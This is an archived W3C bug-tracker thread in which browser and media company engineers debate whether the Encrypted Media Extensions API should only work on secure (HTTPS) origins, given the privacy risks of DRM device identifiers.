This is an archived snapshot of W3C's public bugzilla bug tracker, decommissioned in April 2019. Please see the home page for more details.

Bug 26332 - Applications should only use EME APIs on secure origins (e.g. HTTPS)
Summary: Applications should only use EME APIs on secure origins (e.g. HTTPS)
Status: RESOLVED FIXED
Alias: None
Product: HTML WG
Classification: Unclassified
Component: Encrypted Media Extensions (show other bugs)
Version: unspecified
Hardware: All All
: P2 normal
Target Milestone: ---
Assignee: David Dorwin
QA Contact: HTML WG Bugzilla archive list
URL:
Whiteboard: Security, Privacy, TAG
Keywords:
Depends on:
Blocks: 26838
  Show dependency treegraph
 
Reported: 2014-07-14 22:35 UTC by David Dorwin
Modified: 2015-04-18 00:40 UTC (History)
19 users (show)

See Also:


Attachments

Description David Dorwin 2014-07-14 22:35:28 UTC
Most existing DRM systems use a [effectively] permanent unique identifier in the client, often [based on value(s)] baked into the hardware. It seems likely that such systems also do not effectively anonymize the identifier in the license protocol.

Assuming this is true, EME enables providing a unique device/user identifier (possibly permanent for a given device) to an unauthenticated application, which may then transmit it over the Internet in the clear. This seems unacceptable. Furthermore, tying permissions, such as those for an identifier, to unauthenticated domains is potentially ineffective [1].

There are solutions and mitigations to this problem [2], but they will vary per key system and it is difficult (and unlikely to be followed) to normatively require one or more of them. The only normative and interoperable protection I can think of is to require a secure origin (e.g. HTTPS) when using such key systems.


There is a push to require secure origins/transport for new powerful new web platform features [4], which would include exposing permanent hardware-based identifiers. Restricting the origin/transport is being discussed for other APIs, including WebCrypto [5]. The definition of secure origin and transport is still being debated, but it seems likely some standard definition will emerge and could be referenced by EME.


Failing on unsecure origins (e.g. HTTP) could take various forms. In all cases, I think it makes sense to detect and handle this in MediaKeys::create().
Possible options:
1) EME APIs only work on secure origins: Always fail on HTTP, etc.
2) Key systems that use unique identifiers only work on secure origins: Fail if the implementation of |keySystem| uses identifiers.
3) Key systems that do not have appropriate mitigations [3] only work on secure origins: Fail if the implementation of |keySystem| uses identifiers and does not have appropriate mitigations.

#1 is simple and consistent, but is perhaps too broad. For example, Clear Key does not need HTTPS.
#2 will likely be equivalent to #1 for many implementations, but requires the user agent vendor to proactively do the right thing. It is also perhaps too broad.
#3 probably captures the right set of scenarios where the risk exists, but it leaves a lot of room for judgement and incorrect decisions by user agents.

Assuming there are CDM implementations that fall into #3 (identifier with no appropriate mitigations), applications would need to support HTTPS in order to support those key systems. For applications supporting such key systems, there would effectively be no difference among the three options. On the other hand, #3 (if respected) provides incentive for CDM implementations to use appropriate mitigations, some of which have additional benefits that a secure origin alone cannot provide.

#3 also does not address the previously mentioned permissions issue [1], which is still relevant to some degree even with such appropriate mitigations.


One might argue that this should be part of the non-normative Privacy Considerations or a recommendation similar to the mitigations. However, I do not believe this would result in a measurable improvement. Applications are unlikely to voluntarily switch to HTTPS based solely on such a recommendation (client privacy should not rely on the application anyway), and implementations are unlikely to require secure transport because it will put them at a disadvantage to other implementations. Therefore, it is likely that the only way to actually address the issue is to normatively require secure origins in one of the flavors listed above. #1 is the simplest way to ensure that applications and implementations do the right thing.


[1] “Granting permissions to unauthenticated origins is, in the presence of a network attacker, equivalent to granting the permissions to any origin. The state of the internet is such that we must indeed assume that a network attacker is present.” - [4]
[2] Examples include: encrypt the identifier using a server certificate and salt, not using identifiers, providing unique identifiers per origin
[3] Appropriate mitigations might include: encrypt the identifier using a server certificate and salt
[4] http://lists.w3.org/Archives/Public/public-webappsec/2014Jun/thread.html#msg222
[5] https://www.w3.org/Bugs/Public/show_bug.cgi?id=25972
Comment 1 Ryan Sleevi 2014-07-14 23:03:36 UTC
I don't see how #2/#3 can be sanely/reliably implemented by a UA, given that EME makes it clear that the Key System is "opaque". Bug 20944 captures some of this discussion, as noted, but even the Key System name itself is opaque (in as much as there is no registry).

I do agree that it seems impossible to prevent EME from disclosing some degree of identifying information. At a minimum, you're guaranteed a single-bit of user-state (authorized vs not-authorized), but you're potentially looking at degrees ranging from classes-of-devices to per-user identifiers.

From a UA perspective, it seems like a design goal of EME to keep the UA opaque as to the nature of the CDMs key system, which means that the effective security/privacy of any given CDM is the 'worst possible' of all CDMs. Since the UA has to treat the CDM as a blackbox (again, per the discussions of Bug 20944; if this was not the case, we'd be normatively specifying how key systems behave and what information they're given access to), it seems like you must always assume the CDM has user-and-hardware uniquely-identifying data.

Put differently, if a UA wanted to implement #2/#3, it'd need to know what key systems may be supported, and whether the privacy concerns for that key system align with the UAs or W3C's views on privacy protection. A UA implemented atop a generic API (for example, Microsoft's Media Foundation APIs, http://msdn.microsoft.com/en-us/library/windows/apps/dn466732.aspx ) would need to implement some form of whitelisting, except it's unknown/undocumented what values of key systems are acceptable (no registry).

Further, it'd require the UA to know how the key system was implemented, in order to evaluate how that key system adheres to protecting user identifiers in transit. For some UAs, it'd also require the public to be able to know how the key system was implemented, in order that they can verify the claims of the CDM/UA vendors. If we had such a system where the key system was open/documented, rather than opaque, we presumably wouldn't need EME (Bug 20944).

So it does seem that #1 is the only sane way to cut this knot, at least in a way that ensures the consistency for the greatest number of UAs. That said, it does require understanding a solid definition of secure origin.
Comment 2 Joe Steele 2014-07-15 15:55:31 UTC
(In reply to David Dorwin from comment #0)
> There is a push to require secure origins/transport for new powerful new web
> platform features [4], which would include exposing permanent hardware-based
> identifiers. Restricting the origin/transport is being discussed for other
> APIs, including WebCrypto [5]. The definition of secure origin and transport
> is still being debated, but it seems likely some standard definition will
> emerge and could be referenced by EME.

This W3C Recommendation gives some good guidance (http://www.w3.org/TR/wsc-ui/#typesoftls) on what can be considered secure origins.

> Failing on insecure origins (e.g. HTTP) could take various forms. In all
> cases, I think it makes sense to detect and handle this in
> MediaKeys::create().
> Possible options:
> 1) EME APIs only work on secure origins: Always fail on HTTP, etc.
> 2) Key systems that use unique identifiers only work on secure origins: Fail
> if the implementation of |keySystem| uses identifiers.
> 3) Key systems that do not have appropriate mitigations [3] only work on
> secure origins: Fail if the implementation of |keySystem| uses identifiers
> and does not have appropriate mitigations.
> 
> #1 is simple and consistent, but is perhaps too broad. For example, Clear
> Key does not need HTTPS.
> #2 will likely be equivalent to #1 for many implementations, but requires
> the user agent vendor to proactively do the right thing. It is also perhaps
> too broad.
> #3 probably captures the right set of scenarios where the risk exists, but
> it leaves a lot of room for judgement and incorrect decisions by user agents.

I am in favor of #1. 

However this could cause mixed security messaging, given that the media resources themselves are unlikely to be on secure origins for cost and performance reasons. The key request origins may also not be secure (again for performance reasons) if the key request protocol uses message-based security rather than relying on a TLS channel. How would applications handle this?

An easier problem -- what would failure mean here? Would this be handled with an error code?
Comment 3 John Luther 2014-07-18 16:06:53 UTC
I'm also in favor of #1.
Comment 4 David Dorwin 2014-07-19 00:18:39 UTC
(In reply to Joe Steele from comment #2)
...
> I am in favor of #1. 
> 
> However this could cause mixed security messaging, given that the media
> resources themselves are unlikely to be on secure origins for cost and
> performance reasons. The key request origins may also not be secure (again
> for performance reasons) if the key request protocol uses message-based
> security rather than relying on a TLS channel. How would applications handle
> this?

These would be mixed content scenarios, which should be addressed by https://w3c.github.io/webappsec/specs/mixedcontent/.

> An easier problem -- what would failure mean here? Would this be handled
> with an error code?

Failure would mean the promise returned by MediaKeys::create() is rejected. We would need to specify the DOMException name with which to reject. "NotSupportedError" is consistent with other requests where the requested key system cannot be used. Details could be provided in the DOMException message.
Comment 5 David Dorwin 2014-07-19 01:25:19 UTC
https://dvcs.w3.org/hg/html-media/rev/e68902b0f30d adds secure origin and transport to the Security Considerations and Privacy Considerations sections, including the answers in comment #4. It includes a new step specifying how to fail when an origin is not allowed but does not normatively specify the conditions, which remains to be discussed here.

https://dvcs.w3.org/hg/html-media/rev/7595e9457f23 adds text about secure origins to the Privacy Considerations section on alerts and consent.
Comment 6 Mark Watson 2014-07-22 15:41:22 UTC
(In reply to Ryan Sleevi from comment #1)
> I don't see how #2/#3 can be sanely/reliably implemented by a UA, given that
> EME makes it clear that the Key System is "opaque". Bug 20944 captures some
> of this discussion, as noted, but even the Key System name itself is opaque
> (in as much as there is no registry).
> 
> I do agree that it seems impossible to prevent EME from disclosing some
> degree of identifying information. At a minimum, you're guaranteed a
> single-bit of user-state (authorized vs not-authorized), but you're
> potentially looking at degrees ranging from classes-of-devices to per-user
> identifiers.
> 
> From a UA perspective, it seems like a design goal of EME to keep the UA
> opaque as to the nature of the CDMs key system, which means that the
> effective security/privacy of any given CDM is the 'worst possible' of all
> CDMs. Since the UA has to treat the CDM as a blackbox (again, per the
> discussions of Bug 20944; if this was not the case, we'd be normatively
> specifying how key systems behave and what information they're given access
> to), it seems like you must always assume the CDM has user-and-hardware
> uniquely-identifying data.
> 

No. As described in the Security and Privacy considerations and at great length elsewhere, UA implementors are expected to be aware of the properties of the CDMs with which they integrate and treat them appropriately. This is not a plugin API where you have no knowledge of the properties of the plugin.
Comment 7 Mark Watson 2014-07-22 15:43:26 UTC
(In reply to Joe Steele from comment #2)
> (In reply to David Dorwin from comment #0)
> > There is a push to require secure origins/transport for new powerful new web
> > platform features [4], which would include exposing permanent hardware-based
> > identifiers. Restricting the origin/transport is being discussed for other
> > APIs, including WebCrypto [5]. The definition of secure origin and transport
> > is still being debated, but it seems likely some standard definition will
> > emerge and could be referenced by EME.
> 
> This W3C Recommendation gives some good guidance
> (http://www.w3.org/TR/wsc-ui/#typesoftls) on what can be considered secure
> origins.
> 
> > Failing on insecure origins (e.g. HTTP) could take various forms. In all
> > cases, I think it makes sense to detect and handle this in
> > MediaKeys::create().
> > Possible options:
> > 1) EME APIs only work on secure origins: Always fail on HTTP, etc.
> > 2) Key systems that use unique identifiers only work on secure origins: Fail
> > if the implementation of |keySystem| uses identifiers.
> > 3) Key systems that do not have appropriate mitigations [3] only work on
> > secure origins: Fail if the implementation of |keySystem| uses identifiers
> > and does not have appropriate mitigations.
> > 
> > #1 is simple and consistent, but is perhaps too broad. For example, Clear
> > Key does not need HTTPS.
> > #2 will likely be equivalent to #1 for many implementations, but requires
> > the user agent vendor to proactively do the right thing. It is also perhaps
> > too broad.
> > #3 probably captures the right set of scenarios where the risk exists, but
> > it leaves a lot of room for judgement and incorrect decisions by user agents.
> 
> I am in favor of #1. 
> 
> However this could cause mixed security messaging, given that the media
> resources themselves are unlikely to be on secure origins for cost and
> performance reasons.

It's not just the messaging. Mixed mode is simply disallowed on some browsers, so requiring a secure origin requires the media to be on a secure origin as well.

 The key request origins may also not be secure (again
> for performance reasons) if the key request protocol uses message-based
> security rather than relying on a TLS channel. How would applications handle
> this?

Good question.

> 
> An easier problem -- what would failure mean here? Would this be handled
> with an error code?
Comment 8 Mark Watson 2014-07-22 15:45:16 UTC
> 
> These would be mixed content scenarios, which should be addressed by
> https://w3c.github.io/webappsec/specs/mixedcontent/.
> 

Ironically, that URL results in an SSL Connection Error, which kind-of illustrates one of the problems.
Comment 9 Mark Watson 2014-07-22 15:52:16 UTC
(In reply to David Dorwin from comment #5)
> https://dvcs.w3.org/hg/html-media/rev/e68902b0f30d adds secure origin and
> transport to the Security Considerations and Privacy Considerations
> sections, including the answers in comment #4. It includes a new step
> specifying how to fail when an origin is not allowed but does not
> normatively specify the conditions, which remains to be discussed here.
> 
> https://dvcs.w3.org/hg/html-media/rev/7595e9457f23 adds text about secure
> origins to the Privacy Considerations section on alerts and consent.

I don't agree with either of these changes.

We've been working on this API for some time and there has been no suggestion that UA's may impose a restriction to secure origins. Indeed all of the deployment experience with this API does not apply this restriction. It's a major change to introduce at this stage with significant implications for service providers.

With the existing solution (plugins) there is no such restriction and indeed users have little information and few guarantees around privacy. EME improves on this situation greatly by interposing the UA and we have security considerations that explain well the considerations UAs should apply when integrating with CDMs. I believe this is sufficient.
Comment 10 Mark Watson 2014-07-24 19:11:16 UTC
I suggest we revert those changes until we have consensus.
Comment 11 David Dorwin 2014-07-24 19:37:33 UTC
(In reply to Mark Watson from comment #8)
> > 
> > These would be mixed content scenarios, which should be addressed by
> > https://w3c.github.io/webappsec/specs/mixedcontent/.
> > 
> 
> Ironically, that URL results in an SSL Connection Error, which kind-of
> illustrates one of the problems.

What browser are you using? It works fine for me in Chrome and Firefox. I don't think the fact that SSL might not be configured correctly means we should avoid using it. SSL needs to be configured and used correctly for many other reasons.

(In reply to Mark Watson from comment #10)
> I suggest we revert those changes until we have consensus.

What specifically do you want to revert? There is no normative requirement for secure origins in the text. The current text provides information about the issues to implementors and authors to help them make informed decisions.
Comment 12 Mark Watson 2014-07-24 19:44:44 UTC
(In reply to David Dorwin from comment #11)
> (In reply to Mark Watson from comment #8)
> > > 
> > > These would be mixed content scenarios, which should be addressed by
> > > https://w3c.github.io/webappsec/specs/mixedcontent/.
> > > 
> > 
> > Ironically, that URL results in an SSL Connection Error, which kind-of
> > illustrates one of the problems.
> 
> What browser are you using? It works fine for me in Chrome and Firefox. I
> don't think the fact that SSL might not be configured correctly means we
> should avoid using it. SSL needs to be configured and used correctly for
> many other reasons.

Chrome. It's working now after I cleared browsing data and restarted my machine. Don't really know what the problem was.

The point is that SSL introduces additional failure modes and we have measured this in the field. For our service, we have a baseline for our playback failure rate which, according to our measurements, it is not possible to achieve if there is SSL involved even on the browser that is 'best' in this area (and the 'best' here is much better than the rest).

> 
> (In reply to Mark Watson from comment #10)
> > I suggest we revert those changes until we have consensus.
> 
> What specifically do you want to revert? There is no normative requirement
> for secure origins in the text. The current text provides information about
> the issues to implementors and authors to help them make informed decisions.
Comment 13 Mark Watson 2014-07-24 19:46:11 UTC
> What specifically do you want to revert? There is no normative requirement
> for secure origins in the text. The current text provides information about
> the issues to implementors and authors to help them make informed decisions.

At least the text which gives permission to browsers to require a secure origin. Previously we had not said anything, implying that both secure and insecure origins must be supported.
Comment 14 Joe Steele 2014-07-24 19:53:47 UTC
> Chrome. It's working now after I cleared browsing data and restarted my
> machine. Don't really know what the problem was.
> 
> The point is that SSL introduces additional failure modes and we have
> measured this in the field. For our service, we have a baseline for our
> playback failure rate which, according to our measurements, it is not
> possible to achieve if there is SSL involved even on the browser that is
> 'best' in this area (and the 'best' here is much better than the rest).

As another piece of anecdotal evidence for problems like this - I had a similar problem with Chrome (Chrome rejecting the SSL certificate for google.com). It turned out to be a misconfiguration of the time server on my machine. No amount of Chrome configuration seemed to fix the problem. I don't mean to imply Chrome is alone in these problems -- all the browsers have them. The problem is more in how we present errors to the user, than in the browsers doing something wrong.
Comment 15 Jerry Smith 2014-07-29 00:00:43 UTC
We should also consider intranet use when imposing https as a prerequisite for using EME.  That situation may clearly not warrant https, and it would make sense to give companies the option to use http.

The ID exposure originally mentioned as a concern seems well protected already.  It would require implementing a license server to retrieve and access the ID.  Further, I believe most DRMs that return this ID already protect as part of the license message.

Given this, I don't think we should wire EME to fail on http sites, but have no objection to recommending its use.
Comment 16 Ryan Sleevi 2014-07-29 00:25:56 UTC
(In reply to Jerry Smith from comment #15)
> We should also consider intranet use when imposing https as a prerequisite
> for using EME.  That situation may clearly not warrant https, and it would
> make sense to give companies the option to use http.

Isn't intranet use far simpler to deploy HTTPS? And the risks similar (especially in light of the gTLD explosion)

> 
> The ID exposure originally mentioned as a concern seems well protected
> already.  It would require implementing a license server to retrieve and
> access the ID.  Further, I believe most DRMs that return this ID already
> protect as part of the license message.

I'm a bit confused how this conclusion was reached. Nothing seems to prevent an EME CDM from implementing it's key exchange with the license server in the clear. That is, I don't see how/why it would require implementing a license server to retrieve/access the ID.

That some CDMs have a strong binding to the license server is a point for them, but nothing in EME seems to mandate this level of security. Nor is it an example that the CDM<->License server protocol is itself robust (not vulnerable to crypto-analytic attacks that would reveal ID, for example). ClearKey seems to be proof-positive that you can implement an 'open' exchange.

> 
> Given this, I don't think we should wire EME to fail on http sites, but have
> no objection to recommending its use.
Comment 17 Mark Watson 2014-07-29 01:24:22 UTC
(In reply to Ryan Sleevi from comment #16)
> (In reply to Jerry Smith from comment #15)

> I'm a bit confused how this conclusion was reached. Nothing seems to prevent
> an EME CDM from implementing it's key exchange with the license server in
> the clear. That is, I don't see how/why it would require implementing a
> license server to retrieve/access the ID.
> 
> That some CDMs have a strong binding to the license server is a point for
> them, but nothing in EME seems to mandate this level of security. Nor is it
> an example that the CDM<->License server protocol is itself robust (not
> vulnerable to crypto-analytic attacks that would reveal ID, for example).
> ClearKey seems to be proof-positive that you can implement an 'open'
> exchange.
> 

The EME model is one where the implementors of a UA choose to integrate with particular CDMs, not one where users can install arbitrary CDMs. As such, the implementor of the UA can have certain knowledge of the properties of the CDM.

As with any web API, it is for the UA implementor to take care about what information they expose, to obtain suitable user consent for exposure of information etc. It's not something where the specification needs to dictate to UA implementors.
Comment 18 Jerry Smith 2014-08-12 15:10:37 UTC
Proposed on last week's call:  Add a comment that advises websites SHOULD use consistent https.  This means that https is advised in the general case, but allows sites to depart from this guidance if they have specific rationale for doing so (e.g. they've taken other precautions to ensure secure data transfers).
Comment 19 Mark Watson 2014-08-12 15:15:23 UTC
(In reply to Jerry Smith from comment #18)
> Proposed on last week's call:  Add a comment that advises websites SHOULD
> use consistent https.  This means that https is advised in the general case,
> but allows sites to depart from this guidance if they have specific
> rationale for doing so (e.g. they've taken other precautions to ensure
> secure data transfers).

I don't see why this recommendation belongs in the EME specification. It's a general recommendation for all websites, whatever web platform APIs they use.
Comment 20 Glenn Adams 2014-08-12 15:45:55 UTC
Cox opposes requiring secure origins to use EME. We believe this is an author/service/page provider policy issue that should not be circumscribed by UA policy.
Comment 21 Anne 2014-08-12 16:59:40 UTC
(In reply to Mark Watson from comment #17)
> As with any web API, it is for the UA implementor to take care about what
> information they expose, to obtain suitable user consent for exposure of
> information etc. It's not something where the specification needs to dictate
> to UA implementors.

Actually that is false. A standard can definitely require that an API is only exposed on secure origins, even if that API requires further user opt in. This protects the end user from potential harm. We have not been good with this in the past (e.g. geolocation works on insecure pages), but we should be going forward.
Comment 22 Ryan Sleevi 2014-08-12 19:20:53 UTC
(In reply to Anne from comment #21)
> Actually that is false. A standard can definitely require that an API is
> only exposed on secure origins, even if that API requires further user opt
> in.

The goal of this is interoperability.

Can EME, devoid of any context about the particular CDM implementation, be analyzed to ensure it protects the privacy and security of users?

David sets out in the description that the security analysis of EME cannot be decoupled from particular CDMs, which Mark states that they cannot (in Comment #6) and Jerry also expresses, albeit indirectly, in Comment #15.

However, the CDMs are non-standard, nor necessary guaranteed to be interoperable, which Bug 20944 is tracking. As a result of this, a web developer who wishes to use a CDM/EME has no guarantee whether or not it provides a sufficient level of security for a UA to enable it, nor does a web user have the necessary context to review and decide regarding EME on its merits alone.

Further, because of the EME/CDM split, it's likely (as we can see even from the comments by UAs on this bug) for two vendors to disagree as to whether a particular CDM is sufficiently secure for users - with one requiring a secure transport (because key exchange or functionality is insufficiently handled) while another permitting it on easily intercepted and manipulated channels such as HTTP.

Given that Pervassive Monitoring is an Attack (BCP 188 / RFC 7258), it's important for us to consider what are appropriate/best steps that can be taken to:
- Ensure privacy of users, including privacy from fingerprinting
- Ensure security of users
- Ensure consistency and interoperability for developers using this spec
- Ensure consistency and interoperability of implementations of both EME and CDMs

Despite Mark's claim in Comment #6, there are no normative requirements upon User Agents preventing them from treating CDMs as generic plugins. The closest approximation is the non-normative requirements in Section 6 (Security) and 7 (Privacy) that "CDM implementors must provide sufficient information and controls to user agent implementers", but one can say that the exact same requirements exist for plugins via <object> today.

Given the extensive number of ways for which privacy-sensitive data can be disclosed, as per Section 7 (Privacy), it would seem that enabling this API via HTTP would be akin to enabling authentication cookies over HTTP (i.e. without the secure flag). Even if this information is for the duration of a "session" (an ambiguous concept in practice), that's still enough to enable pervassive monitoring of users.
Comment 23 Mark Watson 2014-08-19 15:44:06 UTC
(In reply to Anne from comment #21)
> (In reply to Mark Watson from comment #17)
> > As with any web API, it is for the UA implementor to take care about what
> > information they expose, to obtain suitable user consent for exposure of
> > information etc. It's not something where the specification needs to dictate
> > to UA implementors.
> 
> Actually that is false. A standard can definitely require that an API is
> only exposed on secure origins, even if that API requires further user opt
> in. This protects the end user from potential harm. We have not been good
> with this in the past (e.g. geolocation works on insecure pages), but we
> should be going forward.

I think my statement was in fact true. I did not say that standards "cannot" require an API to only be exposed to secure origins, I said that it is not necessary. You might disagree, but that is a matter of opinion, not of fact.
Comment 24 Mark Watson 2014-08-19 15:51:44 UTC
(In reply to Ryan Sleevi from comment #22)
> (In reply to Anne from comment #21)
> > Actually that is false. A standard can definitely require that an API is
> > only exposed on secure origins, even if that API requires further user opt
> > in.
> 
> The goal of this is interoperability.
> 
> Can EME, devoid of any context about the particular CDM implementation, be
> analyzed to ensure it protects the privacy and security of users?

No, but there is no need for anyone to do such an analysis. The UAs implementing EME all know what CDMs they are integrating with and their security and privacy properties. This is not an open plugin API with user-installable CDMs.

> 
> David sets out in the description that the security analysis of EME cannot
> be decoupled from particular CDMs, which Mark states that they cannot (in
> Comment #6) and Jerry also expresses, albeit indirectly, in Comment #15.
> 
> However, the CDMs are non-standard, nor necessary guaranteed to be
> interoperable, which Bug 20944 is tracking. As a result of this, a web
> developer who wishes to use a CDM/EME has no guarantee whether or not it
> provides a sufficient level of security for a UA to enable it, nor does a
> web user have the necessary context to review and decide regarding EME on
> its merits alone.

As with any other API, both the user and the web developer rely on the UA to protect their security and privacy. They should have the same guarantees with respect to EME as they have with respect to the same-origin policy, for example.

> 
> Further, because of the EME/CDM split, it's likely (as we can see even from
> the comments by UAs on this bug) for two vendors to disagree as to whether a
> particular CDM is sufficiently secure for users - with one requiring a
> secure transport (because key exchange or functionality is insufficiently
> handled) while another permitting it on easily intercepted and manipulated
> channels such as HTTP.

I don't think we have had such a disagreement as no two UA vendors are presently integrating the same CDM.

> 
> Given that Pervassive Monitoring is an Attack (BCP 188 / RFC 7258), it's
> important for us to consider what are appropriate/best steps that can be
> taken to:
> - Ensure privacy of users, including privacy from fingerprinting
> - Ensure security of users
> - Ensure consistency and interoperability for developers using this spec
> - Ensure consistency and interoperability of implementations of both EME and
> CDMs
> 
> Despite Mark's claim in Comment #6, there are no normative requirements upon
> User Agents preventing them from treating CDMs as generic plugins.

I think the security and privacy issues that you are raising prevent exactly that. We can discuss turning some of the security and privacy considerations into normative requirements if you like.

> The
> closest approximation is the non-normative requirements in Section 6
> (Security) and 7 (Privacy) that "CDM implementors must provide sufficient
> information and controls to user agent implementers", but one can say that
> the exact same requirements exist for plugins via <object> today.

Not at all. There is no mechanism for UA implementors to obtain information from NPAPI plugins as to their security and privacy properties. Nor is there any established practice of UAs whitelisting only those plugins for which the security and privacy properties are understood. This is the problem with NPAPI plugins!

> 
> Given the extensive number of ways for which privacy-sensitive data can be
> disclosed, as per Section 7 (Privacy), it would seem that enabling this API
> via HTTP would be akin to enabling authentication cookies over HTTP (i.e.
> without the secure flag). Even if this information is for the duration of a
> "session" (an ambiguous concept in practice), that's still enough to enable
> pervassive monitoring of users.
Comment 25 Ryan Sleevi 2014-08-19 16:25:18 UTC
(In reply to Mark Watson from comment #24)
> No, but there is no need for anyone to do such an analysis. The UAs
> implementing EME all know what CDMs they are integrating with and their
> security and privacy properties. 

In the W3C, there has been a priority of constituentcies that inherently recognizes the reality of multiple stakeholders being party to the conversations. Users, developers/authors, implementers are all part of the equation.

It sounds like you are stating that only UAs can or should be part of the security and privacy analysis, and that seems to run counter to the W3C's goals of being an open and transparent organization.

> This is not an open plugin API with user-installable CDMs.

While I appreciate you making this point, I feel that this is just your opinion. Both of your co-editors, and their respective organizations, have positioned EME/CDM as precisely that, both in public discussions and, on a more practical matter, within the code itself.

On Microsoft's side, while the goal is to explicitly support PlayReady, it maps onto the more generic Media Foundation APIs - http://msdn.microsoft.com/en-us/library/windows/apps/dn466732.aspx

On Google's side, EME/CDM is exposed through the Pepper plugin interface, Google's replacement for NPAPI. Indeed, even the existing EME implementations in Chrome are progrmatically no different than generic plugins.

I think if you wish to support this view, it may be necessary to have the spec state so. However, I think such a statement would likely prove harmful to the spec overall, as much of the discussion related to this spec has been whether or not it's tangibly different than the <object> tag. Your statement - which is that CDMs are UA-specific - would seem to support an intentionally far less interoperable view than many W3C members have realized.


> As with any other API, both the user and the web developer rely on the UA to
> protect their security and privacy. They should have the same guarantees
> with respect to EME as they have with respect to the same-origin policy, for
> example.

Mark, I'm sure you can see that, unlike the same-origin policy or other security relevant features, it is a by-design goal of the authors of this spec that the capabilities of a CDM be opaque to the general public and authoring community, beyond that which the CDM author shares. Unlike the same origin policy, this makes it difficult to evaluate the security and privacy context in which these CDMs operate.

Considering that you and your fellow authors have listed a number of capabilities being exposed to CDMs that are otherwise not exposed to the web (except via the <object> tag), which carry with them significant privacy risks and support for permanent device identifiers, I think it's a bit disingenuous to compare a privacy net-negative with features designed to bolster security, or to suggest that users should fully rely on the UA to assuage their privacy concerns for a spec developed publicly and with the intent of being a W3C document.

> 
> > 
> > Further, because of the EME/CDM split, it's likely (as we can see even from
> > the comments by UAs on this bug) for two vendors to disagree as to whether a
> > particular CDM is sufficiently secure for users - with one requiring a
> > secure transport (because key exchange or functionality is insufficiently
> > handled) while another permitting it on easily intercepted and manipulated
> > channels such as HTTP.
> 
> I don't think we have had such a disagreement as no two UA vendors are
> presently integrating the same CDM.

I don't feel this satisfactorily deals with the issue, unless you believe that a lack of interoperability is a goal or feature of this specification.

It would seem, based on the significant feedback from the community, that having two or more UA vendors ship the same CDM is a highly desirable outcome. As such, it does not seem you can reasonably ignore or dismiss this issue, unless you believe that UA vendors should not ship interoperable CDMs.


> > The
> > closest approximation is the non-normative requirements in Section 6
> > (Security) and 7 (Privacy) that "CDM implementors must provide sufficient
> > information and controls to user agent implementers", but one can say that
> > the exact same requirements exist for plugins via <object> today.
> 
> Not at all. There is no mechanism for UA implementors to obtain information
> from NPAPI plugins as to their security and privacy properties. 

I'm not sure - are you suggesting that this exists for CDMs? Or is this merely a statement to the effect that "Since you can't do it for NPAPI, you don't need to do it for EME"?

> Nor is there
> any established practice of UAs whitelisting only those plugins for which
> the security and privacy properties are understood. 

There has been, for some time, such a practice.

http://www.chromium.org/developers/npapi-deprecation
http://blogs.msdn.com/b/ie/archive/2011/02/28/activex-filtering-for-consumers.aspx
Comment 26 Glenn Adams 2014-08-19 16:51:16 UTC
(In reply to Ryan Sleevi from comment #25)
> (In reply to Mark Watson from comment #24)
> > No, but there is no need for anyone to do such an analysis. The UAs
> > implementing EME all know what CDMs they are integrating with and their
> > security and privacy properties. 
> 
> In the W3C, there has been a priority of constituentcies that inherently
> recognizes the reality of multiple stakeholders being party to the
> conversations. Users, developers/authors, implementers are all part of the
> equation.
> 
> It sounds like you are stating that only UAs can or should be part of the
> security and privacy analysis, and that seems to run counter to the W3C's
> goals of being an open and transparent organization.

To the extent that UAs do not support user installable CDMs, then Mark is correct.

In any case, what UAs do with CDMs has no bearing on the W3C as an "open and transparent organization".

> 
> > This is not an open plugin API with user-installable CDMs.
> 
> While I appreciate you making this point, I feel that this is just your
> opinion. Both of your co-editors, and their respective organizations, have
> positioned EME/CDM as precisely that, both in public discussions and, on a
> more practical matter, within the code itself.

Whether CDMs are an open plugin API or not is the decision of the UA vendor.

> 
> On Microsoft's side, while the goal is to explicitly support PlayReady, it
> maps onto the more generic Media Foundation APIs -
> http://msdn.microsoft.com/en-us/library/windows/apps/dn466732.aspx
> 
> On Google's side, EME/CDM is exposed through the Pepper plugin interface,
> Google's replacement for NPAPI. Indeed, even the existing EME
> implementations in Chrome are progrmatically no different than generic
> plugins.
> 
> I think if you wish to support this view, it may be necessary to have the
> spec state so.

The spec will not place requirements on UAs with respect to how they choose to support CDMs. If you would like to write another spec that does so, then you may draft and submit it for consideration.

> However, I think such a statement would likely prove harmful
> to the spec overall, as much of the discussion related to this spec has been
> whether or not it's tangibly different than the <object> tag. Your statement
> - which is that CDMs are UA-specific - would seem to support an
> intentionally far less interoperable view than many W3C members have
> realized.

Mark is not stating that it is intentional. At this point, it is just a historical fact, not predicated or influenced by the spec.

> 
> 
> > As with any other API, both the user and the web developer rely on the UA to
> > protect their security and privacy. They should have the same guarantees
> > with respect to EME as they have with respect to the same-origin policy, for
> > example.
> 
> Mark, I'm sure you can see that, unlike the same-origin policy or other
> security relevant features, it is a by-design goal of the authors of this
> spec that the capabilities of a CDM be opaque to the general public and
> authoring community, beyond that which the CDM author shares. Unlike the
> same origin policy, this makes it difficult to evaluate the security and
> privacy context in which these CDMs operate.

The authors of the EME spec are the HTML WG, not the editors. It is certainly not true that it is a by-design goal of the WG that the capabilities of a CDM be opaque.

CDMs operate as an integral (or integrated) part of a UA; therefore, they are as opaque or as transparent as the UA vendor chooses to make them. If a UA supports installable CDMs, then it is up to the installer to determine their level of trust by whatever means they require. This is SOP for the Web today.

> 
> Considering that you and your fellow authors have listed a number of
> capabilities being exposed to CDMs that are otherwise not exposed to the web
> (except via the <object> tag), which carry with them significant privacy
> risks and support for permanent device identifiers, I think it's a bit
> disingenuous to compare a privacy net-negative with features designed to
> bolster security, or to suggest that users should fully rely on the UA to
> assuage their privacy concerns for a spec developed publicly and with the
> intent of being a W3C document.

A user that entirely relies upon a UA to "assuage their privacy concerns" is simply ignorant of the risks that exist in either the pre-EME world of media or the EME world. EME and CDMs don't change this fact.

> 
> > 
> > > 
> > > Further, because of the EME/CDM split, it's likely (as we can see even from
> > > the comments by UAs on this bug) for two vendors to disagree as to whether a
> > > particular CDM is sufficiently secure for users - with one requiring a
> > > secure transport (because key exchange or functionality is insufficiently
> > > handled) while another permitting it on easily intercepted and manipulated
> > > channels such as HTTP.
> > 
> > I don't think we have had such a disagreement as no two UA vendors are
> > presently integrating the same CDM.
> 
> I don't feel this satisfactorily deals with the issue, unless you believe
> that a lack of interoperability is a goal or feature of this specification.

Nobody thinks that lack of interoperability is a goal or feature. That's just a silly statement.

> 
> It would seem, based on the significant feedback from the community, that
> having two or more UA vendors ship the same CDM is a highly desirable
> outcome.

